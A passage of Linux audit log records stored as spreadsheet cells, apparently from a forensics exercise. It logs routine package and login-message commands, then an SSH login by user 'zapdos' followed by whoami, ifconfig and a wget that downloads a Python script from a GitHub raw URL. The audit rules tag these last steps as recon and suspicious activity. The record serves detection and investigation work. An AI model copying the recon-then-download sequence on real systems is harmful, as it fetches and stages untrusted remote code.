    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55a2e9fccba0 a1=55a2e9fccb60 a2=55a2e9fccb88 a3=55a2e9fcc010 items=2 ppid=2338 pid=2339 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="apt-config" exe="/usr/bin/apt-config" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="apt-config" a1="shell" a2="StateDir" a3="Dir::State"</t>
  </si>
  <si>
    <t>proctitle=6170742D636F6E666967007368656C6C005374617465446972004469723A3A5374617465</t>
  </si>
  <si>
    <t>msg=audit(1584777456.226:920):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55f9a55e1270 a1=55f9a55ecd30 a2=7ffd5b4eb9b0 a3=2 items=2 ppid=2339 pid=2340 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="dpkg" exe="/usr/bin/dpkg" key="software_mgmt"</t>
  </si>
  <si>
    <t>argc=2 a0="/usr/bin/dpkg" a1="--print-foreign-architectures"</t>
  </si>
  <si>
    <t>proctitle=2F7573722F62696E2F64706B67002D2D7072696E742D666F726569676E2D61726368697465637475726573</t>
  </si>
  <si>
    <t>msg=audit(1584777456.238:921):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55a2e9fccba0 a1=55a2e9fccb60 a2=55a2e9fccb88 a3=7f0b92030810 items=2 ppid=2338 pid=2341 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="apt-config" exe="/usr/bin/apt-config" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="apt-config" a1="shell" a2="ListDir" a3="Dir::State::Lists"</t>
  </si>
  <si>
    <t>proctitle=6170742D636F6E666967007368656C6C004C697374446972004469723A3A53746174653A3A4C69737473</t>
  </si>
  <si>
    <t>msg=audit(1584777456.242:922):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55ba1f246270 a1=55ba1f251d30 a2=7fff6262c2a0 a3=2 items=2 ppid=2341 pid=2342 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="dpkg" exe="/usr/bin/dpkg" key="software_mgmt"</t>
  </si>
  <si>
    <t>msg=audit(1584777456.246:923):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55a2e9fccbb0 a1=55a2e9fccb70 a2=55a2e9fccb98 a3=7f0b92030810 items=2 ppid=2338 pid=2343 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="apt-config" exe="/usr/bin/apt-config" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="apt-config" a1="shell" a2="DpkgStatus" a3="Dir::State::status"</t>
  </si>
  <si>
    <t>proctitle=6170742D636F6E666967007368656C6C0044706B67537461747573004469723A3A53746174653A3A737461747573</t>
  </si>
  <si>
    <t>msg=audit(1584777456.250:924):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=557893386270 a1=557893391d30 a2=7fffe79f6110 a3=2 items=2 ppid=2343 pid=2344 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="dpkg" exe="/usr/bin/dpkg" key="software_mgmt"</t>
  </si>
  <si>
    <t>msg=audit(1584777456.254:925):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55a2e9fccba0 a1=55a2e9fccb60 a2=55a2e9fccb88 a3=55a2e9fcc010 items=2 ppid=2338 pid=2345 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="apt-config" exe="/usr/bin/apt-config" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="apt-config" a1="shell" a2="EtcDir" a3="Dir::Etc"</t>
  </si>
  <si>
    <t>proctitle=6170742D636F6E666967007368656C6C00457463446972004469723A3A457463</t>
  </si>
  <si>
    <t>msg=audit(1584777456.258:926):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=561918a64270 a1=561918a6fd30 a2=7ffdb0a286c0 a3=2 items=2 ppid=2345 pid=2346 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="dpkg" exe="/usr/bin/dpkg" key="software_mgmt"</t>
  </si>
  <si>
    <t>msg=audit(1584777456.262:927):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55a2e9fccbb0 a1=55a2e9fccb70 a2=55a2e9fccb98 a3=7f0b92030810 items=2 ppid=2338 pid=2347 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="apt-config" exe="/usr/bin/apt-config" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="apt-config" a1="shell" a2="SourceList" a3="Dir::Etc::sourcelist"</t>
  </si>
  <si>
    <t>proctitle=6170742D636F6E666967007368656C6C00536F757263654C697374004469723A3A4574633A3A736F757263656C697374</t>
  </si>
  <si>
    <t>msg=audit(1584777456.266:928):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5555ed98e270 a1=5555ed999d30 a2=7fff5313fad0 a3=2 items=2 ppid=2347 pid=2348 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="dpkg" exe="/usr/bin/dpkg" key="software_mgmt"</t>
  </si>
  <si>
    <t>msg=audit(1584777456.266:929):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55a2e9fcd0d8 a1=55a2e9fcd068 a2=55a2e9fcd0c0 a3=55a2e9fcc010 items=2 ppid=2338 pid=2349 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="find" exe="/usr/bin/find" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=10 a0="find" a1="/var/lib/apt/lists/" a2="/etc/apt/sources.list" a3="//var/lib/dpkg/status" a4="-type" a5="f" a6="-newer" a7="/var/lib/update-notifier/hwe-eol" a8="-print" a9="-quit"</t>
  </si>
  <si>
    <t>proctitle=66696E64002F7661722F6C69622F6170742F6C697374732F002F6574632F6170742F736F75726365732E6C697374002F2F7661722F6C69622F64706B672F737461747573002D747970650066002D6E65776572002F7661722F6C69622F7570646174652D6E6F7469666965722F6877652D656F6C002D7072696E74002D717569</t>
  </si>
  <si>
    <t>msg=audit(1584777456.382:930):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55a2e9fccbd0 a1=55a2e9fccba0 a2=55a2e9fccbb8 a3=55a2e9fcc010 items=2 ppid=2352 pid=2353 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="dirname" exe="/usr/bin/dirname" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="dirname" a1="/var/lib/update-notifier/hwe-eol"</t>
  </si>
  <si>
    <t>proctitle=6469726E616D65002F7661722F6C69622F7570646174652D6E6F7469666965722F6877652D656F6C</t>
  </si>
  <si>
    <t>msg=audit(1584777456.386:931):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55a2e9fccbc8 a1=55a2e9fccb90 a2=55a2e9fccbb0 a3=55a2e9fcc010 items=2 ppid=2338 pid=2352 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="mktemp" exe="/bin/mktemp" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="mktemp" a1="-p" a2="/var/lib/update-notifier"</t>
  </si>
  <si>
    <t>proctitle=6D6B74656D70002D70002F7661722F6C69622F7570646174652D6E6F746966696572</t>
  </si>
  <si>
    <t>msg=audit(1584777456.406:932):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55a2e8ff1bb0 a1=55a2e8ff1b80 a2=55a2e8ff1b98 a3=7f0b92030810 items=2 ppid=2338 pid=2354 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="cat" exe="/bin/cat" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="cat" a1="/var/lib/update-notifier/hwe-eol"</t>
  </si>
  <si>
    <t>proctitle=636174002F7661722F6C69622F7570646174652D6E6F7469666965722F6877652D656F6C</t>
  </si>
  <si>
    <t>msg=audit(1584777456.410:933):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55a2e8ff1bd0 a1=55a2e8ff1b98 a2=55a2e8ff1bb8 a3=7f0b92030810 items=2 ppid=2338 pid=2355 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="rm" exe="/bin/rm" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="rm" a1="-f" a2="/var/lib/update-notifier/tmp.5z3PiePIan"</t>
  </si>
  <si>
    <t>proctitle=726D002D66002F7661722F6C69622F7570646174652D6E6F7469666965722F746D702E357A335069655049616E</t>
  </si>
  <si>
    <t>msg=audit(1584777456.438:934):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55c161762d00 a1=55c16175e260 a2=7ffe6e1f8208 a3=8 items=3 ppid=2300 pid=2356 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="98-fsck-at-rebo" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="/bin/sh" a1="/etc/update-motd.d/98-fsck-at-reboot"</t>
  </si>
  <si>
    <t>proctitle=2F62696E2F7368002F6574632F7570646174652D6D6F74642E642F39382D6673636B2D61742D7265626F6F74</t>
  </si>
  <si>
    <t>msg=audit(1584777456.442:935):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55afb3b54348 a1=55afb3b543a0 a2=55afb3b543b0 a3=55afb3b54010 items=3 ppid=2300 pid=2356 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="update-motd-fsc" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="/bin/sh" a1="/usr/lib/update-notifier/update-motd-fsck-at-reboot"</t>
  </si>
  <si>
    <t>msg=audit(1584777456.446:936):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5586610ab4f8 a1=5586610ab4b8 a2=5586610ab4e0 a3=55865f74c962 items=2 ppid=2356 pid=2357 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="stat" exe="/usr/bin/stat" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="stat" a1="-c" a2="%Y" a3="/var/lib/update-notifier/fsck-at-reboot"</t>
  </si>
  <si>
    <t>proctitle=73746174002D63002559002F7661722F6C69622F7570646174652D6E6F7469666965722F6673636B2D61742D7265626F6F74</t>
  </si>
  <si>
    <t>msg=audit(1584777456.446:937):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5586610ab458 a1=5586610ab420 a2=5586610ab440 a3=5586610ab010 items=2 ppid=2358 pid=2359 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="awk" exe="/usr/bin/mawk" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="awk" a1=7B7072696E742024317D a2="/proc/uptime"</t>
  </si>
  <si>
    <t>proctitle=61776B007B7072696E742024317D002F70726F632F757074696D65</t>
  </si>
  <si>
    <t>msg=audit(1584777456.446:938):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5586610ab448 a1=5586610ab408 a2=5586610ab430 a3=5586610ab650 items=2 ppid=2356 pid=2358 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="date" exe="/bin/date" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="date" a1="-d" a2=6E6F77202D20313237382E3032207365636F6E6473 a3="+%s"</t>
  </si>
  <si>
    <t>proctitle=64617465002D64006E6F77202D20313237382E3032207365636F6E6473002B2573</t>
  </si>
  <si>
    <t>msg=audit(1584777456.446:939):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55865f954bf0 a1=55865f954bc0 a2=55865f954bd8 a3=5586610ab010 items=2 ppid=2356 pid=2360 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="date" exe="/bin/date" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584777456.446:940):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5586610ae098 a1=5586610ae068 a2=5586610ae080 a3=5586610ab010 items=2 ppid=2361 pid=2363 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="awk" exe="/usr/bin/mawk" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="awk" a1=2435207E202F5E65787428327C337C3429242F207B207072696E74202431207D</t>
  </si>
  <si>
    <t>proctitle=61776B002435207E202F5E65787428327C337C3429242F207B207072696E74202431207D</t>
  </si>
  <si>
    <t>msg=audit(1584777456.450:941):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5586610ae058 a1=5586610ae030 a2=5586610ae040 a3=5586610ab010 items=2 ppid=2361 pid=2362 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="mount" exe="/bin/mount" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=1 a0="mount"</t>
  </si>
  <si>
    <t>proctitle="mount"</t>
  </si>
  <si>
    <t>msg=audit(1584777456.458:942):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5586610ae0e8 a1=5586610ae090 a2=5586610ae0d0 a3=5586610ab010 items=2 ppid=2356 pid=2364 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="dumpe2fs" exe="/sbin/dumpe2fs" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="dumpe2fs" a1="-h" a2="/dev/sda1"</t>
  </si>
  <si>
    <t>proctitle=64756D7065326673002D68002F6465762F73646131</t>
  </si>
  <si>
    <t>msg=audit(1584777456.490:943):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5586610ae0d8 a1=5586610ae098 a2=5586610ae0c0 a3=5586610ab010 items=2 ppid=2365 pid=2368 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="cut" exe="/usr/bin/cut" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="cut" a1="-d:" a2="-f" a3="2-"</t>
  </si>
  <si>
    <t>proctitle=637574002D643A002D6600322D</t>
  </si>
  <si>
    <t>msg=audit(1584777456.502:944):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5586610ae0a8 a1=5586610ae078 a2=5586610ae090 a3=5586610ab010 items=2 ppid=2365 pid=2367 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="grep" exe="/bin/grep" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="grep" a1=5E4D6F756E7420636F756E743A</t>
  </si>
  <si>
    <t>proctitle=67726570005E4D6F756E7420636F756E743A</t>
  </si>
  <si>
    <t>msg=audit(1584777456.502:945):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5586610ae0d8 a1=5586610ae098 a2=5586610ae0c0 a3=5586610ab010 items=2 ppid=2369 pid=2372 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="cut" exe="/usr/bin/cut" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584777456.502:946):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5586610ae0b0 a1=5586610ae080 a2=5586610ae098 a3=5586610ab010 items=2 ppid=2369 pid=2371 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="grep" exe="/bin/grep" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="grep" a1=5E4D6178696D756D206D6F756E7420636F756E743A</t>
  </si>
  <si>
    <t>proctitle=67726570005E4D6178696D756D206D6F756E7420636F756E743A</t>
  </si>
  <si>
    <t>msg=audit(1584777456.502:947):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5586610ae0d8 a1=5586610ae098 a2=5586610ae0c0 a3=5586610ab010 items=2 ppid=2373 pid=2377 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="cut" exe="/usr/bin/cut" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584777456.506:948):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5586610ae0d8 a1=5586610ae098 a2=5586610ae0c0 a3=5586610ab010 items=2 ppid=2373 pid=2376 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="cut" exe="/usr/bin/cut" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="cut" a1="-d(" a2="-f" a3="1"</t>
  </si>
  <si>
    <t>proctitle=637574002D6428002D660031</t>
  </si>
  <si>
    <t>msg=audit(1584777456.506:949):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5586610ae0a8 a1=5586610ae078 a2=5586610ae090 a3=5586610ab010 items=2 ppid=2373 pid=2375 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="grep" exe="/bin/grep" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="grep" a1=5E436865636B20696E74657276616C3A</t>
  </si>
  <si>
    <t>proctitle=67726570005E436865636B20696E74657276616C3A</t>
  </si>
  <si>
    <t>msg=audit(1584777456.506:950):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5586610ae0d8 a1=5586610ae098 a2=5586610ae0c0 a3=5586610ab010 items=2 ppid=2378 pid=2381 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="cut" exe="/usr/bin/cut" key="rootcmd"</t>
  </si>
  <si>
    <t>msg=audit(1584777456.510:951):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5586610ae0a8 a1=5586610ae078 a2=5586610ae090 a3=5586610ab010 items=2 ppid=2378 pid=2380 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="grep" exe="/bin/grep" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="grep" a1=5E4E65787420636865636B2061667465723A</t>
  </si>
  <si>
    <t>proctitle=67726570005E4E65787420636865636B2061667465723A</t>
  </si>
  <si>
    <t>msg=audit(1584777456.510:952):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5586610ae0e0 a1=5586610ae0a0 a2=5586610ae0c8 a3=5586610ae3b0 items=2 ppid=2356 pid=2382 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="date" exe="/bin/date" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4 a0="date" a1="-d" a2="" a3="+%s"</t>
  </si>
  <si>
    <t>proctitle=64617465002D6400002B2573</t>
  </si>
  <si>
    <t>msg=audit(1584777456.510:953):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55865f954ba8 a1=55865f954b78 a2=55865f954b90 a3=7f708d9e5810 items=2 ppid=2356 pid=2383 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="cat" exe="/bin/cat" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="cat" a1="/var/lib/update-notifier/fsck-at-reboot"</t>
  </si>
  <si>
    <t>proctitle=636174002F7661722F6C69622F7570646174652D6E6F7469666965722F6673636B2D61742D7265626F6F74</t>
  </si>
  <si>
    <t>msg=audit(1584777456.514:954):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=55c161762d00 a1=55c16175e260 a2=7ffe6e1f8208 a3=8 items=3 ppid=2300 pid=2384 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="98-reboot-requi" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=2 a0="/bin/sh" a1="/etc/update-motd.d/98-reboot-required"</t>
  </si>
  <si>
    <t>proctitle=2F62696E2F7368002F6574632F7570646174652D6D6F74642E642F39382D7265626F6F742D7265717569726564</t>
  </si>
  <si>
    <t>msg=audit(1584777456.514:955):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=562339388348 a1=5623393883a0 a2=5623393883b0 a3=562339388010 items=3 ppid=2300 pid=2384 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="update-motd-reb" exe="/bin/dash" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3 a0="/bin/sh" a1="-e" a2="/usr/lib/update-notifier/update-motd-reboot-required"</t>
  </si>
  <si>
    <t>type=USER_START</t>
  </si>
  <si>
    <t>msg=audit(1584777456.514:956):</t>
  </si>
  <si>
    <t>pid=2229 uid=0 auid=1000 ses=6 msg='op=PAM:session_open acct="zapdos" exe="/usr/sbin/sshd" hostname=192.168.0.102 addr=192.168.0.102 terminal=ssh res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777456.518:957):</t>
  </si>
  <si>
    <t>pid=2385 uid=0 auid=1000 ses=6 msg='op=PAM:setcred acct="zapdos" exe="/usr/sbin/sshd" hostname=192.168.0.102 addr=192.168.0.102 terminal=ssh res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777456.518:958):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=92 success=yes exit=0 a0=5649771bf34c a1=3e8 a2=5 a3=7f377c59dcc0 items=1 ppid=1015 pid=2229 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="sshd" exe="/usr/sbin/sshd" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584777456.538:959):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=257 success=yes exit=10 a0=ffffff9c a1=7f377c5b9f20 a2=80002 a3=0 items=1 ppid=1015 pid=2229 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="sshd" exe="/usr/sbin/sshd" key="session"</t>
  </si>
  <si>
    <t>msg=audit(1584777456.538:960):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=257 success=yes exit=9 a0=ffffff9c a1=7f377d36b959 a2=1 a3=0 items=1 ppid=1015 pid=2229 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="sshd" exe="/usr/sbin/sshd" key="session"</t>
  </si>
  <si>
    <t>msg=audit(1584777456.550:961):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=257 success=yes exit=9 a0=ffffff9c a1=7fff28eb7810 a2=42 a3=180 items=2 ppid=1015 pid=2229 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=6 comm="sshd" exe="/usr/sbin/sshd" key="login"</t>
  </si>
  <si>
    <t>msg=audit(1584777456.550:962):</t>
  </si>
  <si>
    <t>pid=2229 uid=0 auid=1000 ses=6 msg='op=login id=1000 exe="/usr/sbin/sshd" hostname=192.168.0.102 addr=192.168.0.102 terminal=/dev/pts/3 res=success'</t>
  </si>
  <si>
    <t>msg=audit(1584777456.622:963):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=92 success=yes exit=0 a0=5591d8701dd0 a1=3e8 a2=3e8 a3=5591d86f5010 items=1 ppid=2385 pid=2386 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts3 ses=6 comm="bash" exe="/bin/bash" key="perm_mod"</t>
  </si>
  <si>
    <t>proctitle="-bash"</t>
  </si>
  <si>
    <t>msg=audit(1584777456.642:964):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=92 success=yes exit=0 a0=5591d8702d80 a1=3e8 a2=3e8 a3=5591d86f5010 items=1 ppid=2385 pid=2386 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts3 ses=6 comm="bash" exe="/bin/bash" key="perm_mod"</t>
  </si>
  <si>
    <t>msg=audit(1584777457.054:965):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=257 success=yes exit=8 a0=ffffff9c a1=55bf846f856b a2=0 a3=0 items=1 ppid=1 pid=809 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="accounts-daemon" exe="/usr/lib/accountsservice/accounts-daemon" key="etcpasswd"</t>
  </si>
  <si>
    <t>proctitle="/usr/lib/accountsservice/accounts-daemon"</t>
  </si>
  <si>
    <t>msg=audit(1584777457.054:966):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=257 success=yes exit=8 a0=ffffff9c a1=7ff1c5d762a3 a2=80000 a3=0 items=1 ppid=1 pid=809 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="accounts-daemon" exe="/usr/lib/accountsservice/accounts-daemon" key="etcpasswd"</t>
  </si>
  <si>
    <t>msg=audit(1584777457.054:967):</t>
  </si>
  <si>
    <t>msg=audit(1584777457.054:968):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=257 success=yes exit=9 a0=ffffff9c a1=7ff1c5d762a3 a2=80000 a3=0 items=1 ppid=1 pid=809 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="accounts-daemon" exe="/usr/lib/accountsservice/accounts-daemon" key="etcpasswd"</t>
  </si>
  <si>
    <t>msg=audit(1584777457.054:969):</t>
  </si>
  <si>
    <t>msg=audit(1584777481.518:970):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591d87e79c0 a1=5591d87fbc80 a2=5591d8712cb0 a3=5591d86f5010 items=2 ppid=2386 pid=2447 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts3 ses=6 comm="whoami" exe="/usr/bin/whoami" key="recon"</t>
  </si>
  <si>
    <t>argc=1 a0="whoami"</t>
  </si>
  <si>
    <t>proctitle="whoami"</t>
  </si>
  <si>
    <t>msg=audit(1584777496.698:971):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591d87cafc0 a1=5591d87d0c70 a2=5591d8712cb0 a3=5591d86f5010 items=2 ppid=2386 pid=2478 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts3 ses=6 comm="ifconfig" exe="/sbin/ifconfig" key="sbin_susp"</t>
  </si>
  <si>
    <t>msg=audit(1584777524.638:972):</t>
  </si>
  <si>
    <t>arch=c000003e syscall=59 success=yes exit=0 a0=5591d870d840 a1=5591d8800b30 a2=5591d8712cb0 a3=8 items=2 ppid=2386 pid=2540 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts3 ses=6 comm="wget" exe="/usr/bin/wget" key="susp_activity"</t>
  </si>
  <si>
    <t>argc=4 a0="wget" a1="https://raw.githubusercontent.com/yohdeepsnow/pythonfordummies/master/main.py" a2="-o" a3="script.py"</t>
  </si>
  <si>
